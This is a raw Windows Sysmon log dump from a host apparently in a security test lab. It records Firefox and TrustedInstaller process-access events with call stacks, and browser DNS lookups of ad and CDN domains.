10341000x800000000000000017780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.519{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.519{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.519{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.519{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.519{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.457{59A5CD1D-945A-6005-3305-00000000A301}7052reddit-d.openx.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.440{59A5CD1D-945A-6005-3305-00000000A301}7052status.geotrust.com0type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:93.184.220.29;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.428{59A5CD1D-945A-6005-3305-00000000A301}7052e13136.g.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.425{59A5CD1D-945A-6005-3305-00000000A301}7052e13136.g.akamaiedge.net0104.79.89.133;C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000017771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.424{59A5CD1D-945A-6005-3305-00000000A301}7052reddit-d.openx.net035.244.159.8;34.98.64.218;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:30.423{59A5CD1D-945A-6005-3305-00000000A301}7052z.moatads.com0type: 5 wildcard.moatads.com.edgekey.net;type: 5 e13136.g.akamaiedge.net;::ffff:104.79.89.133;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:33.847{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla 
Firefox\xul.dll+2fe8ebf 10341000x800000000000000017793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:33.847{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 22542200x800000000000000017792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.053{59A5CD1D-945A-6005-3305-00000000A301}7052partner.googleadservices.com0type: 5 partnerad.l.doubleclick.net;::ffff:142.250.74.194;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.053{59A5CD1D-8E56-6005-2E00-00000000A301}2464218.64.98.34.in-addr.arpa.0type: 12 
218.64.98.34.bc.googleusercontent.com;C:\Windows\sysmon64.exe 22542200x800000000000000017790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.053{59A5CD1D-8E56-6005-2E00-00000000A301}2464133.89.79.104.in-addr.arpa.0type: 12 a104-79-89-133.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000017789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.053{59A5CD1D-8E56-6005-2E00-00000000A301}2464161.212.58.216.in-addr.arpa.0type: 12 ams15s22-in-f1.1e100.net;type: 12 fra24s01-in-f1.1e100.net;type: 12 ams15s22-in-f161.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000017788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.053{59A5CD1D-8E56-6005-2E00-00000000A301}246465.207.58.216.in-addr.arpa.0type: 12 fra16s25-in-f1.1e100.net;C:\Windows\sysmon64.exe 10341000x800000000000000017805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:34.363{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla 
Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:34.363{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:34.363{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 22542200x800000000000000017802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:32.201{59A5CD1D-945A-6005-3305-00000000A301}7052da397d706f8a732ae3e55e4f8d8d18c4.safeframe.googlesyndication.com0type: 5 pagead-googlehosted.l.google.com;::ffff:216.58.207.65;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.751{59A5CD1D-945A-6005-3305-00000000A301}7052eu-u.openx.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:31.750{59A5CD1D-945A-6005-3305-00000000A301}7052eu-u.openx.net035.244.159.8;34.98.64.218;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:31.749{59A5CD1D-945A-6005-3305-00000000A301}7052eu-u.openx.net0::ffff:34.98.64.218;::ffff:35.244.159.8;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:34.269{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:34.269{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:34.269{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla 
Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:34.035{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:35.191{59A5CD1D-93F8-6005-EB04-00000000A301}36642908C:\Windows\servicing\TrustedInstaller.exe{59A5CD1D-93F8-6005-EC04-00000000A301}2488C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\combase.dll+693a8|C:\Windows\servicing\TrustedInstaller.exe+43a2|C:\Windows\servicing\TrustedInstaller.exe+1d1d|C:\Windows\servicing\TrustedInstaller.exe+28c6|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.972{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program 
Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.972{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.972{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla 
Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 